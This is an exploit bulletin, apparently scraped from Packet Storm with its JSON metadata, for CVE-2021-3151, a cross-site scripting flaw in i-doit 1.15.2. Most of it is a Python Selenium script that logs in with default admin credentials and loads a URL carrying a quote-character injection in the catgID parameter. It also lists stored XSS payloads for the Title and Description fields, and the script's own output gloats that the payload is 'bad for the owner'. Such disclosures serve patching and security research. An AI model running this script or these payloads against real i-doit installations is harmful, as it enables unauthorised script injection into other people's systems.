ID PACKETSTORM:162815 Type packetstorm Reporter nu11secur1ty Modified 2021-05-26T00:00:00
Description
`# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from Infrastructure
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.25.2021
# Vendor: https://www.i-doit.org/news/
# Link: https://www.i-doit.org/new-minor-release-i-doit-open-1-15-2/
# From Github:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip
# CVE: CVE-2021-3151 - NEW
# Proof: https://streamable.com/vofczm
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3151
from selenium import webdriver
import time
import os, sys
# Vendor: https://www.i-doit.org/news/
website_link="http://192.168.1.160/?"
# enter your login username
username="admin"
# enter your login password
password="admin"
#enter the element for username input field
element_for_username="login_username"
#enter the element for password input field
element_for_password="login_password"
#enter the element for submit button
element_for_submit="login_submit"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
time.sleep(1)
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit XSS vulnerability parameter viewMode
time.sleep(3)
# Payload Parameter: "viewMode" (Infrastructure > catgID=41 == XSS
injection simbol{'})
browser.get(("
http://192.168.1.160/index.php?viewMode=1002&tvMode=1006&tvType=1&objID=26&catgID=41%27
"))
print("The payload is deployed now this is bad for the owner \;)\...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, but something is wrong and this exploit is not working...")
## The exploit
## Vulnerable (Infrastructure) section
## Parameter:
viewMode (Infrastructure, Object, Network > local pots = XSS simbol{'})
- URL
http://192.168.1.2/?viewMode=1100&tvMode=1006&tvType=1&objID=26&catgID=41&objTypeID=19&cateID=1&editMode=1
## insert the payload into:
Title: <script>alert("nu11secur1ty_is_here");</script>
Description: <script>alert("nu11secur1ty_is_here");</script>
---------------------------------
# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from
Infrastructure
# Date: 05.25.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://www.i-doit.org/news/
# Software Link:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3151
`
{"id": "PACKETSTORM:162815", "type": "packetstorm", "bulletinFamily": "exploit", "title": "i-doit 1.15.2 Cross Site Scripting", "description": "", "published": "2021-05-26T00:00:00", "modified": "2021-05-26T00:00:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "href": "https://packetstormsecurity.com/files/162815/i-doit-1.15.2-Cross-Site-Scripting.html", "reporter": "nu11secur1ty", "references": [], "cvelist": ["CVE-2021-3151"], "immutableFields": [], "lastseen": "2021-05-26T18:01:24", "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-3151"]}], "modified": "2021-05-26T18:01:24", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-05-26T18:01:24", "rev": 2}, "vulnersScore": 4.5}, "sourceHref": "https://packetstormsecurity.com/files/download/162815/idoit1152-xss.txt", "sourceData": "`# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from Infrastructure \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 05.25.2021 \n# Vendor: https://www.i-doit.org/news/ \n# Link: https://www.i-doit.org/new-minor-release-i-doit-open-1-15-2/ \n# From Github: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip \n# CVE: CVE-2021-3151 - NEW \n# Proof: https://streamable.com/vofczm \n \n[+] Exploit Source: \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-3151 \n \nfrom selenium import webdriver \nimport time \nimport os, sys \n \n \n# Vendor: https://www.i-doit.org/news/ \nwebsite_link=\"http://192.168.1.160/?\" \n \n# enter your login username \nusername=\"admin\" \n \n# enter your login password \npassword=\"admin\" \n \n#enter the element for username input field \nelement_for_username=\"login_username\" \n \n#enter the element for password input field \nelement_for_password=\"login_password\" \n \n#enter the element for submit button \nelement_for_submit=\"login_submit\" \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(1) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \n \n# Exploit XSS vulnerability parameter viewMode \ntime.sleep(3) \n# Payload Parameter: \"viewMode\" (Infrastructure > catgID=41 == XSS \ninjection simbol{'}) \nbrowser.get((\" \nhttp://192.168.1.160/index.php?viewMode=1002&tvMode=1006&tvType=1&objID=26&catgID=41%27 \n\")) \n \nprint(\"The payload is deployed now this is bad for the owner \\;)\\...\\n\") \n \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Sorry, but something is wrong and this exploit is not working...\") \n \n## The exploit \n \n## Vulnerable (Infrastructure) section \n## Parameter: \nviewMode (Infrastructure, Object, Network > local pots = XSS simbol{'}) \n \n- URL \n \nhttp://192.168.1.2/?viewMode=1100&tvMode=1006&tvType=1&objID=26&catgID=41&objTypeID=19&cateID=1&editMode=1 \n \n## insert the payload into: \n \nTitle: <script>alert(\"nu11secur1ty_is_here\");</script> \nDescription: <script>alert(\"nu11secur1ty_is_here\");</script> \n \n--------------------------------- \n \n# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from \nInfrastructure \n# Date: 05.25.2021 \n# Exploit Authotr idea: @nu11secur1ty \n# Exploit Debugging: @nu11secur1ty \n# Vendor Homepage: https://www.i-doit.org/news/ \n# Software Link: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip \n# Steps to Reproduce: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3151 \n`\n"}
